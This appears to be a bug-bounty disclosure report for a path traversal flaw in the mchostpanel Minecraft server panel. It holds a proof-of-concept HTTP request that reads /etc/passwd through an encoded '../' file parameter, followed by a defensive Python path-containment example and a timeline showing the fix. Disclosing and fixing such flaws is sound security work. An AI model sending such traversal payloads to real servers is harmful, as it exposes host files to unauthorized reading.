Path Traversal in alanaktion/mchostpanel

Valid

Reported on

Sep 5th 2021


✍️ Description

A Path Traversal vulnerability was identified in the mchostpanel Minecraft server control panel. The `file` parameter of the `file_get` request in ajax.php is not confined to the intended directory, which allows an attacker to read arbitrary files on the host.

🕵️‍♂️ Proof of Concept

POST /ajax.php HTTP/1.1
Host: localhost:8080
User-Agent: curl/7.47.0
Accept: */*
Content-Length: 45
Content-Type: application/x-www-form-urlencoded

req=file_get&file=..%2F..%2F..%2Fetc%2Fpasswd

💥 Impact

This issue may lead to unauthorized local file access (information disclosure), as the proof of concept shows with /etc/passwd.
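The defensive pattern that closes this class of bug is a containment check: canonicalize the requested path relative to the directory the panel is allowed to serve from, and refuse anything that resolves outside it. The following is an added example, not code from the mchostpanel project or from this report; the `ALLOWED_BASE` directory is a hypothetical stand-in for whatever directory the real `file_get` handler serves. It parses the exact form-encoded body from the proof of concept above and shows it being rejected while an in-directory request is accepted.

```python
"""Hardened handling of a user-supplied `file` parameter (added example)."""
import os
from urllib.parse import parse_qs

# Hypothetical directory the panel may serve files from. The real
# mchostpanel layout is not shown in the report; this value is an assumption.
ALLOWED_BASE = "/srv/mchostpanel/server"


class PathTraversalError(ValueError):
    """Raised when a requested path would resolve outside the allowed base."""


def resolve_within(base_dir: str, user_path: str) -> str:
    """Return the canonical absolute path of user_path inside base_dir.

    Raises PathTraversalError if the canonical path escapes base_dir, so
    '../' sequences, absolute paths and symlinks that point outside the base
    are all caught by one containment check instead of a blacklist of patterns.
    """
    if "\x00" in user_path:
        raise PathTraversalError("null byte in path")
    if user_path.startswith(("/", "\\")) or os.path.isabs(user_path):
        raise PathTraversalError("absolute paths are not accepted")
    base = os.path.realpath(base_dir)
    # realpath collapses '..' and resolves symlinks, so the comparison below
    # is made on canonical forms rather than on the raw request string.
    candidate = os.path.realpath(os.path.join(base, user_path))
    # The '+ os.sep' guard stops '/srv/x' from matching '/srv/xyz'.
    if candidate != base and not candidate.startswith(base + os.sep):
        raise PathTraversalError(f"{user_path!r} resolves outside {base}")
    return candidate


def handle_file_get(body: str, base_dir: str = ALLOWED_BASE) -> str:
    """Parse a form-encoded body like the PoC and validate its `file` value.

    parse_qs URL-decodes the values, which is why the handler sees '../'
    rather than the '..%2F' that was on the wire.
    """
    params = parse_qs(body)
    if params.get("req") != ["file_get"]:
        raise ValueError("unsupported request type")
    file_param = params.get("file", [""])[0]
    if not file_param:
        raise ValueError("missing file parameter")
    return resolve_within(base_dir, file_param)


def is_safe_request(body: str, base_dir: str = ALLOWED_BASE) -> bool:
    """True if the body would be served, False if the handler rejects it."""
    try:
        handle_file_get(body, base_dir)
        return True
    except ValueError:  # PathTraversalError is a ValueError subclass
        return False


if __name__ == "__main__":
    # Constructed sample bodies: the first is the report's PoC payload,
    # the second a benign request for a file inside the base directory.
    for body in ("req=file_get&file=..%2F..%2F..%2Fetc%2Fpasswd",
                 "req=file_get&file=server.properties"):
        try:
            print("ALLOW", handle_file_get(body))
        except ValueError as exc:
            print("DENY ", body, "->", exc)
```

The check compares canonical paths rather than searching the input for `..`, so encodings, mixed separators and symlinks inside the base that point elsewhere are handled by the same rule. Serving only from an allow-list of known file names is stricter still and is preferable when the set of readable files is small.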

Occurrences

We have contacted a member of the alanaktion/mchostpanel team and are waiting to hear back 3 months ago
Alan Hardman validated this vulnerability 3 months ago
Dwi Siswanto has been awarded the disclosure bounty
The fix bounty is now up for grabs
Alan Hardman confirmed that a fix has been merged on 27d5a9 3 months ago
Alan Hardman has been awarded the fix bounty